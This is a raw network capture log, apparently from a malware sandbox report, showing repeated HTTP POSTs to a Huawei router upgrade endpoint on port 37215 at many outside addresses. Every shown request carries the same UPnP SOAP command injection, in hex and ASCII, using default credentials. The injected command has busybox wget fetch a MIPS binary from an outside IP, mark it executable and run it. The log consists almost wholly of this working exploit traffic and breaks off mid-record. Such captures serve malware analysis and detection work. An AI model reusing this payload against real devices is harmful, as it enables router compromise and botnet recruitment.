                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            757192.168.2.1354960156.86.244.3137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.731555939 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            758192.168.2.1345998197.6.6.19937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.732625008 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            759192.168.2.1333040197.67.106.15537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.733766079 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            760192.168.2.1357338156.126.41.4037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.734955072 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            761192.168.2.1347608156.1.86.19837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.735960007 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            762192.168.2.1344866156.111.149.7737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.738142014 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            763192.168.2.1358650156.58.2.14237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.739622116 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            764192.168.2.135923041.111.68.22037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.740863085 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            765192.168.2.135395041.157.185.237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.741975069 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            766192.168.2.135657041.43.111.17737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.743037939 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 